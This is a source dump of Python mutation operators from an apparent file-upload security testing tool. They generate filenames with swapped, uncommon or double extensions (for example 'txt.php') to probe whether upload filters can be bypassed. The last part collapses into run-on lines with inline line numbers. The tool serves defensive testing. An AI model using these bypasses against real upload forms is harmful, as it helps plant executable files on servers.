# 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M12TXT`` and put ``txt.`` in front of the extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M12TXT'

        # The existing extension stays last, so an upload filter has to judge
        # the final segment rather than the first one after the name.
        output['fileext'] = 'txt.' + output['fileext']

--------------------------------------------------------------------------------
/mutation_op/m04_m4v.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP',
'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP','M12_XHT'],'xhtml':['M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_M4V','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}#['M04_JPG', 'M04_GIF', 
# 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4M4V`` and set the extension to ``m4v``.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys; any previous extension is overwritten.
        ``seed_file`` is passed to ``utils.extract_filename`` only when
        ``output`` has no filename yet; ``resource_file`` is not used here.
        """
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4M4V'
        output['fileext'] = 'm4v'

--------------------------------------------------------------------------------
/mutation_op/m04_xla.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT',
'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP', 'M12_XHT'],'xhtml':['M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_XLA','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}# ['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
# Remaining members of the mOP class whose header is on the preceding lines of this listing.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4XLA`` and set the extension to ``xla``.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys; any previous extension is overwritten.
        ``seed_file`` is passed to ``utils.extract_filename`` only when
        ``output`` has no filename yet; ``resource_file`` is not used here.
        """
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4XLA'
        output['fileext'] = 'xla'

--------------------------------------------------------------------------------
/mutation_op/m04_gzip.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP','M12_XHT'],'xhtml':['M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ',
'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_GZIP','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
# Remaining members of the mOP class whose header is on the preceding lines of this listing.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4GZIP`` and set the extension to ``gzip``.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys; any previous extension is overwritten.
        ``seed_file`` is passed to ``utils.extract_filename`` only when
        ``output`` has no filename yet; ``resource_file`` is not used here.
        """
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4GZIP'
        output['fileext'] = 'gzip'

--------------------------------------------------------------------------------
/mutation_op/m04_pages.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_PAGES','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_PAGES','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP', 'M12_XHT'],'xhtml':['M12_PAGES','M04_ACE', 'M04_ARC',
'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_PAGES','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_GIF', 'M12_PNG']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
# Remaining members of the mOP class whose header is on the preceding lines of this listing.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PAGES`` and set the extension to ``pages``.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys; any previous extension is overwritten.
        ``seed_file`` is passed to ``utils.extract_filename`` only when
        ``output`` has no filename yet; ``resource_file`` is not used here.
        """
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PAGES'
        output['fileext'] = 'pages'

--------------------------------------------------------------------------------
/mutation_op/m12_zip.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation12: Double extension"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT',
'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12ZIP' 19 | 20 | output['fileext'] = 'zip.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m10.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation10: Change Extensions to Not commonly used" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M07', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 
'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11','M12_BZ2','M12_GIF','M12_PDF','M12_PNG','M12_TAR_GZ','M12_TXT','M12_JPG','M12_XHT','M12_ZIP'], 'xhtml':[ 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11','M12_BZ2','M12_GIF','M12_JPG','M12_PNG','M12_TAR_GZ','M12_TXT','M12_ZIP','M12_PDF'], 'js':['M12_HTML','M12_XHTML','M10', 'M11','M12_GIF','M12_JPG','M12_PNG']}#['M01_GIF','M01_JPG', 'M01_PNG', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 